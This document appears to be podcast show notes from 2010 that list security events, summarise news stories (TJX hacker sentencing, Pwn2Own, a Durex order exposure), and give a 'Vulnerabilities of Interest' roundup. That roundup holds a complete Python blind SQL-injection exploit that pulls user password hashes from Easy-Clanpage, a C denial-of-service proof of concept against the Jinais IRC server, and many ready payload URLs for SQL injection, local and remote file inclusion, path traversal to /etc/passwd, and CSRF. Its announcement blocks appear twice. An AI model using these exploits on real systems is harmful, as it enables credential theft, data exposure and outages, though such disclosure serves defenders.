  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

• April 15th – 18th, 2010 Cleveland, Ohio
• http://notacon.org/
• Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class

• May 8, 2010 Jeffersonville,  Indiana
• (No URL for that as of yet)
• Proceeds with be going to the Hackers for Charity Food For Work Program

Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. 1. justVisual 2.0 (index.php?p=) is subject to a Local File Inclusion (LFI) vulnerability.  Vulnerable code: <?php
      ob_start();//;print_r($_GET);
      error_reporting(E_ALL);
      function __autoload($class_name){
      $f=realpath(‘..’).’/classes/’.$class_name.’.php’;
      if (file_exists($f))
      require_once $f ;
      else {
      die(‘File ‘.$f.’ does not exist. Referer:
      ‘.(isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] :
      ‘none’).’<br/>’);
      }
      }
      Config::init();
      >
      $xmldb=XmlDb::getInstance();
      >
      $selfname=basename($_SERVER['PHP_SELF'],’.php’);
      if(isset($_GET['p']) && !empty($_GET['p'])) {
      //$selfname=basename($_GET['p'],’.php’);
      $selfname=str_replace(‘.php’,”,$_GET['p']);

      $filepath=dirname(dirname($_SERVER['SCRIPT_FILENAME'])).’/control/’.$selfn
      ame.’.php’;//echo
      $selfname;
      if(!file_exists($filepath)) {
      include ‘../control/defaultcontrol.php’;
      }
      else
      include ‘../control/’.$selfname.’.php’;
      }
      Proof of Concept is available: http://www.sample.com/index.php?p=[LFI]

   2. Joomla component com_universal (UWCMS Universal Web CMS) is subject to a Remote File Inclusion (RFI) vulnerability. This affects version 1.0.0.  Vulnerable code: /includes/config/config.html.php

      global $mosConfig_absolute_path;
      require_once($mosConfig_absolute_path.”/administrator/components/com_
      universal/includes/config/configuracion.php”);

      Proof of Concept is available: http://www.sample.com/administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path= [sh3ll inj3ct0r]

   3. N-13 News is subject to a File Disclosure vulnerability. Example URL is available: http://www.sample.com/modules/login.php?default_login_language={FILE}
   4. CF Image Hosting Script is subject to a File Disclosure vulnerability. Version 1.0 is impacted.  Example URL is available: http://www.sample.com/?img=../{FILE}
   5. Easy-Clanpage is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Easy-Clanpage 2.2 and versions prior to and including Easy-Clanpage 2.0 are vulnerable; other versions may be affected as well.Example URL is available: http://www.sample.com/[path]/?section=user&amp;action=details&amp;id=-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*
      http://www.sample.com/ecp_version2/?section=user&amp;action=details&amp;func=stats&amp;id=1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))&gt;1

      The following exploit is available:
      #!/usr/bin/env python
      #-*- coding:utf-8 -*-
      import sys, urllib2, getopt

      def out(str):
      sys.stdout.write(str)
      sys.stdout.flush()

      class Exploit:
      charset = “0123456789abcdefABCDEF”
      url = “”
      charn = 1
      id = 1
      table_prefix = “”
      table_field = “”
      passwd = “”
      columns = []
      find_passwd = True

      def __init__(self):
      if len(sys.argv) < 2:
      print “*****************************************************************************”
      print “******************** Easy-Clanpage V2.0 Profil Page Hack ********************”
      print “*****************************************************************************”
      print “*                Discovered and vulnerability by Easy Laster                *”
      print “*                             coded by Dr.ChAoS                             *”
      print “*****************************************************************************”
      print “* Usage:                                                                    *”
      print “* python exploit.py [OPTION...] [SWITCH...] <url>                           *”
      print “*                                                                           *”
      print “* Example:                                                                  *”
      print “*                                                                           *”
      print “* Get the password of the user with id 2:                                   *”
      print “* python exploit.py -id 2 http://site.de/ecp/                               *”
      print “*                                                                           *”
      print “* Get email and username of id 1:                                           *”
      print “* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *”
      print “*                                                                           *”
      print “* Switches:                                                                 *”
      print “* –nopw                                  Search no password                *”
      print “*                                                                           *”
      print “* Options:                                                                  *”
      print “* –id=<user id>                          User id                           *”
      print “* –prefix=<table prefix>                 Table prefix of ECP               *”
      print “* –columns=<max_chars:column_name,…>   Get value of any column you want  *”
      print “*****************************************************************************”
      exit()
      opts, switches = getopt.getopt(sys.argv[1:], “”, ["id=", "prefix=", "columns=", "nopw"])
      for opt in opts:
      if opt[0] == “–id”:
      self.id = int(opt[1])
      elif opt[0] == “–prefix”:
      self.table_prefix = opt[1]
      elif opt[0] == “–columns”:
      for col in opt[1].split(“,”):
      max, name = col.split(“:”)
      self.columns.append([max, name, ""])
      elif opt[0] == “–nopw”:
      self.find_passwd = False
      for switch in switches:
      if switch[:4] == “http”:
      if switch[-1:] == “/”:
      self.url = switch
      else:
      self.url = switch + “/”
      def generate_url(self, ascii):
      return self.url + “index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20″ + self.table_field + “%20FROM%20″ + self.table_prefix + “ecp_user%20WHERE%20userID=” + str(self.id) + “%20LIMIT%200,1),” + str(self.charn) + “,1))%3E” + str(ord(ascii))
      def start(self):
      print “Exploiting…”
      if self.find_passwd:
      self.password()
      if len(self.columns) > 0:
      self.read_columns()
      print “All finished!\n”
      print “—— Results ——”
      if len(self.columns) > 0:
      for v in self.columns:
      print “Column \”" + v[1] + “\”: ” + v[2]
      if self.find_passwd:
      if len(self.passwd) == 32:
      print “Password: ” + self.passwd
      else:
      print “Password not found!”
      print “——————–”
      def read_columns(self):
      end = False
      charrange = [0]
      charrange.extend(range(32, 256))
      for i in range(len(self.columns)):
      out(“Getting value of \”" + self.columns[i][1] + “\”: “)
      self.table_field = self.columns[i][1]
      for pwc in range(1, int(self.columns[i][0]) + 1):
      if end == True:
      break
      self.charn = pwc
      end = False
      for c in charrange:
      src = urllib2.urlopen(self.generate_url(chr(c))).read()
      if “<b>Warning</b>:  mysql_result() [" in src:
      if c == 0:
      end = True
      else:
      self.columns[i][2] += chr(c)
      out(chr(c))
      break
      out(“\n”)
      def password(self):
      out(“Getting password: “)
      self.table_field = “password”
      for pwc in range(1, 33):
      self.charn = pwc
      for c in self.charset:
      src = urllib2.urlopen(self.generate_url(c)).read()
      if “<b>Warning</b>:  mysql_result() [" in src:
      self.passwd += c
      out(c)
      break
      out("\n")

      exploit = Exploit()
      exploit.start()

   6. JINAIS is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. INAIS 0.1.8 is vulnerable; other versions may also be affected. Exploit code is available:
      /*
      Jinais IRC Server 0.1.8 - NULL Pointer PoC

      This PoC will disconnect the affected target IRC server using
      a NULL Pointer vulnerability.

      Copyright 2010 Salvatore Fresta aka Drosophila

      This program is free software; you can redistribute it and/or
      modify it under the terms of  the  GNU General Public License
      as published by the  Free Software Foundation; either version
      2 of the License, or (at your option) any later version.

      This program  is  distributed  in the hope  that  it  will be
      useful, but WITHOUT ANY WARRANTY;  without  even the  implied
      warranty  of  MERCHANTABILITY  or  FITNESS  FOR  A PARTICULAR
      PURPOSE. See the GNU General Public License for more details.

      You should have  received a copy  of  the  GNU General Public
      License along  with  this program;  if not, write to the Free
      Software Foundation,Inc., 59 Temple Place, Suite 330, Boston,
      MA 02111-1307 USA

      http://www.gnu.org/licenses/gpl-2.0.txt

      */

      #include <stdio.h>
      #include <string.h>
      #include <getopt.h>
      #include <stdlib.h>
      #include <time.h>
      #ifdef WIN32
      #include <winsock.h>
      #define close closesocket
      #else
      #include <sys/types.h>
      #include <sys/socket.h>
      #include <netinet/in.h>
      #include <unistd.h>
      #include <errno.h>
      #include <netdb.h>
      #endif

      #define BUFF_SIZE 256
      #define DEFAULT_PORT 4002

      int socket_connect(char *server, int port);
      char *socket_receive(int sock, int tout);
      int socket_send(int socket, char *buffer, size_t size);
      int socket_close(int socket);

      int main(int argc, char *argv[]) {

      int sd,
      rnd_num,
      len,
      port = DEFAULT_PORT;
      char pkg[BUFF_SIZE],
      *response = NULL,
      *host = NULL;

      if(argc < 2) {
      printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
      “\nhttp://www.salvatorefresta.net”
      “\n”
      “\nUsage: %s <target_hostname> <port> (default: %d)\n\n”, argv[0], port);
      return -1;
      }

      srand(time(NULL));

      host = argv[1];
      if(argc > 2) port = atoi(argv[2]);

      printf(“\nJinais IRC Server 0.1.8 NULL Pointer PoC – (c) Salvatore Fresta”
      “\nhttp://www.salvatorefresta.net”
      “\n\n[*] Connecting to %s:%hu…”, host, port);

      sd = socket_connect(host, port);
      if(sd < 0) {
      printf(“\n[-] Error on connect!\n\n”);
      return -1;
      }

      printf(“\n[+] Connection estabilished”
      “\n[*] Loggin to IRC server…”);

      login:

      rnd_num = rand()%100+1;

      len = snprintf(pkg, sizeof(pkg), “NICK randomnickname%d\r\n”, rnd_num);
      if(len < 0 || len > sizeof(pkg)) {
      perror(“\n[-] Error: snprintf”);
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror(“\n[-] Error: socket_send”);
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror(“\n[-] Error: socket_receive”);
      socket_close(sd);
      return -1;
      }

      if(strstr(response, “Nickname is already in use”)) {
      free(response);
      goto login;
      }
      free(response);

      printf(“\n[+] Login successfully”
      “\n[*] Data sending…”);

      rnd_num = rand()%100+1;
      len = snprintf(pkg, sizeof(pkg), “USER blabla\r\nTOPIC #ch%d\r\n”, rnd_num);
      if(len < 0 || len > sizeof(pkg)) {
      perror(“\n[-] Error: snprintf”);
      socket_close(sd);
      return -1;
      }

      if(socket_send(sd, pkg, len) < 0) {
      perror(“\n[-] Error: socket_send”);
      socket_close(sd);
      return -1;
      }

      response = socket_receive(sd, 3);
      if(!response) {
      perror(“\n[-] Error: socket_receive”);
      socket_close(sd);
      return -1;
      }

      socket_close(sd);

      printf(“\n[+] Data sent successfully”
      “\n[+] Connection closed\n\n”);

      return 0;

      }

      int socket_connect(char *server, int port) {

      int sd;
      struct sockaddr_in sock;
      struct hostent *host = NULL;

      #ifdef WIN32
      WSADATA wsadata;
      if(WSAStartup(MAKEWORD(1,0), &wsadata)) return -1;
      #endif

      memset(&sock, 0, sizeof(sock));

      if((sd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;

      sock.sin_family = AF_INET;
      sock.sin_port = htons(port);

      if(!(host=gethostbyname(server))) return -1;

      sock.sin_addr = *((struct in_addr *)host->h_addr);

      if(connect(sd, (struct sockaddr *) &sock, sizeof(sock)) < 0) return -1;

      return sd;

      }

      char *socket_receive(int sock, int tout) {

      int ret,
      byte_recv,
      oldpkglen = 0,
      pkglen = 0;
      char *buffer = NULL,
      tmp[128];
      struct timeval timeout;
      fd_set input;

      if(sock < 0) return NULL;

      while (1) {

      FD_ZERO(&input);
      FD_SET(sock, &input);

      if(tout > 0) {
      timeout.tv_sec  = tout;
      timeout.tv_usec = 0;
      ret = select(sock + 1, &input, NULL, NULL, &timeout);
      }
      else
      ret = select(sock + 1, &input, NULL, NULL, NULL);

      if (!ret) break;
      if (ret < 0) return NULL;

      byte_recv = recv(sock, tmp, sizeof(tmp), 0);

      if(byte_recv < 0) return NULL;

      if(!byte_recv) break;

      oldpkglen = pkglen;
      pkglen += byte_recv;

      buffer = (char *) realloc(buffer, pkglen+1);

      if(!buffer) return NULL;

      memcpy(buffer+oldpkglen, tmp, byte_recv);

      }

      if(buffer) buffer[pkglen] = 0;

      return buffer;

      }

      int socket_send(int socket, char *buffer, size_t size) {

      if(socket < 0) return -1;

      return send(socket, buffer, size, 0) < 0 ? -1 : 0;

      }

      int socket_close(int socket) {

      if(socket < 0) return -1;

      return close(socket) < 0 ? -1 : 0;

      }

   7. New-CMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. New-CMS 1.21 and prior are vulnerable. Example URL is available: http://www.sample.com/index.php?pg=[LFI]
   8. From the Pwn2Own Contest: Microsoft Internet Explorer is subject to multiple unspecified remote code-execution vulnerabilities. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. The vulnerabilities affect Internet Explorer 8; other versions may be vulnerable as well. The researcher responsible for discovering these issues has developed exploit code to trigger the vulnerabilities. This exploit code is not known to be publicly available.
   9. From the Pwn2Own Contest: Apple Safari is prone to an unspecified remote code-execution vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks may cause denial-of-service conditions. This vulnerability affects Apple Safari 4 versions running on the Mac OS X platform; other versions may be vulnerable as well. The researcher responsible for discovering this issue has developed exploit code to trigger this vulnerability. This exploit code is not known to be publicly available.

Stories of Interest:
News item 1: http://www.wired.com/threatlevel/2010/03/tjx-sentencing/
Convicted TJX hacker Albert Gonzalez was sentenced to 20 years in prison on Thursday for leading a gang of cyberthieves who stole more than 90 million credit and debit card numbers from TJX and other retailers.

The sentence for the largest computer-crime case ever prosecuted is the lengthiest ever imposed in the United States for hacking or identity-theft. Gonzalez was also fined $25,000. Restitution, which will likely be in the tens of millions, was not decided Thursday.

Clean-cut, wearing a beige jail uniform and wireframe glasses, the 28-year-old Gonzalez sat motionless at his chair during Thursday’s proceedings, his hands folded in front of him.

Before the sentence was pronounced, Gonzalez told the court he deeply regrets his crimes, and is remorseful for having taken advantage of the personal relationships he’d forged. “Particularly one I had with a certain government agency – that gave me a second chance in life,” said the hacker, who had worked as a paid informant for the Secret Service. “I blame nobody but myself.”

News item 2: http://www.nytimes.com/2010/03/21/world/asia/21grid.html
It came as a surprise this month to Wang Jianwei, a graduate engineering student in Liaoning, China, that he had been described as a potential cyberwarrior before the United States Congress.

Larry M. Wortzel, a military strategist and China specialist, told the House Foreign Affairs Committee on March 10th that it should be concerned because “Chinese researchers at the Institute of Systems Engineering of Dalian University of Technology published a paper on how to attack a small U.S. power grid sub-network in a way that would cause a cascading failure of the entire U.S.”

When reached by telephone, Mr. Wang said he and his professor had indeed published “Cascade-Based Attack Vulnerability on the U.S. Power Grid” in an international journal called Safety Science last spring. But Mr. Wang said he had simply been trying to find ways to enhance the stability of power grids by exploring potential vulnerabilities.

“We usually say ‘attack’ so you can see what would happen,” he said. “My emphasis is on how you can protect this. My goal is to find a solution to make the network safer and better protected.” And independent American scientists who read his paper said it was true: Mr. Wang’s work was a conventional technical exercise that in no way could be used to take down a power grid.

News item 3: http://www.computerworld.com/s/article/9174078/iPhone_Safari_IE8_Firefox_all_fall_on_day_one_of_Pwn2Own?taxonomyId=17
Hackers took down Apple’s iPhone and Safari browser, Microsoft’s Internet Explore 8 (IE8) and Mozilla’s Firefox within minutes at today’s Pwn2Own contest, as expected.

The two-man team of Vincenzo Iozzo and Ralf-Philipp Weinmann exploited the iPhone in under five minutes, said a spokeswoman for 3Com TippingPoint, the security company that sponsored the contest. The pair also walked away with $15,000 in cash, a record prize for the challenge, which is in its fourth year.

Iozzo, an Italian college student, works for Zynamics GmbH, the company headed by noted researcher Thomas Dullien, better known as Halvar Flake, while Weinmann is a post-doctoral researcher at the Laboratory of Algorithms, Cryptology and Security at the University of Luxembourg.

Weinmann is probably best known for being part of a three-man team that in 2007 demonstrated how to crack the Wi-Fi security protocol WEP much faster than previously thought possible.

News item 4: https://www.infosecisland.com/articleview/3392-Durex-condom-orders-exposed-on-the-Internet.html

Earlier we talked about a security problem involving the web site of a Durex product. On March 5, a customer reportedly discovered that anyone could view his and other customers’ orders on the kohinoorpassion.com web site by simply inserting a different order ID number in the url without any login required. Names, addresses, phone numbers, and type of products ordered were all there for ready viewing. The orders had not been placed on the kohninoorpassion.com web site, but on the Durex India e-store site.

From what the customer could determine, the earliest order exposed online dated back to February 23, 2009, but there is no confirmation as to for how long the customer records might have been accessible without a login. According to the customer’s web site about the breach, no credit card or financial data were exposed.

The customer reported that he promptly contacted TTK-LIG (the marketer of the Durex brand in India and manufacturer of Kohinoor condoms) and SSL International (the owner of the Durex brand worldwide) about the problem and that by the next day, the site appeared to be better secured. But that wasn’t the end of the story, it seems. The customer created his own web site and FAQ about the breach and has been updating it since then. A review of the updates suggest that things took an ugly turn within a matter of weeks.

Announcements:

MyHardDriveDied.com:

• Data Recovery Class is $3500 for all classes to reserve and register, please complete this form and return it to me Email: smoulton@nicservices.com or Fax: 770-926-7089, or go to http://www.myharddrivedied.com/seated-class-cc-form.pdf. Here are the current dates and locations for the classes:
  • Washington DC – April 12th to 16th
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Hard Drive Kung Fu Magic – Outerzone 6 2010 by Scott Moulton

SANS Community Atlanta:

• SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression April 15 – 21, 2010 (http://www.sans.org/atlanta-security-leadership-2010-cs)
• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Notacon 7

April 15th – 18th, 2010 Cleveland, Ohio
http://notacon.org/
Adrian will be there presenting on Anti-Forensics

Kentuckiana Metasploit Class
May 8, 2010 Jeffersonville,  Indiana

(No URL for that as of yet)
Proceeds with be going to the Hackers for Charity Food For Work Program
Friends of the Podcast:

Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. uhttp Server is subject to a Path Traversal vulnerability. Version 0.1.0-alpha is affected, though others may be as well.  The problem is in the management of the bad chars that can be used to launch some attacks, such as the directory traversal. The path traversal sequence (‘../’) is not checked, so it can be used for seeking the directories of the affected system.  Example URL is available: http://www.sample.com/GET /../../../../../../etc/passwd HTTP/1.1
2. Harris Stratex 2100 subscriber station is subject to a Cross Site Request Forgery vulnerability.  This vulnerability would allow an attacker to view the running configuration without authentication.  Version 3.0.4.1.7.C is impacted.  Example HTML code is available:
   <html>
   <body>
   <body xonload=”config.submit();”>
   <form method=”get”
   action=”http:192.168.1.1/frameCmd6.html”>
   <input value=”Current
   Configuration”>
   </form>
   </body>
   </html>
3. The Joomla Component com_gds is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_gds&task=store&Storeid=-1+UNION+SELECT+1,2,3,4,5,6–
4. The Joomla Component com_cx is subject to a SQL Injection vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_cx&task=postview&postid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41–
5. The Joomla Component J!Research is subject to a Local File Inclusion (LFI) vulnerability.  This could be exploited by an attacker to expose sensitive data.  Example URL is available: http://www.sample.com/index.php?option=com_jresearch&controller=../../../../../../../../../../proc/self/environ%00
6. The Joomla Component com_cb is subject to a SQL Injection vulnerability because it fails to santize user supplied inputs used in a SQL query.  Example URL is available: http://www.sample.com/index.php?option=com_cb&task=list&cat=-1+UNION+SELECT+1,2,3,4,5–.
7. The Joomla Component SMEStorage is subject to a Local File Inclusion (LFI) vulnerability.  Example URL is available: http://www.sample.com/index.php?option=com_smestorage&controller=[LFI]%00
8. The Joomla Component com_jwmmxtd is subject to a Remote File Inclusion (RFI) vulnerability.  Example URL is available: http://www.sample.com/administrator/components/com_jwmmxtd/admin.jwmmxtd.php?mosConfig_absolute_path= [inj3ct0r]

OuterZone Review

http://dc949.org/projects/floodgate/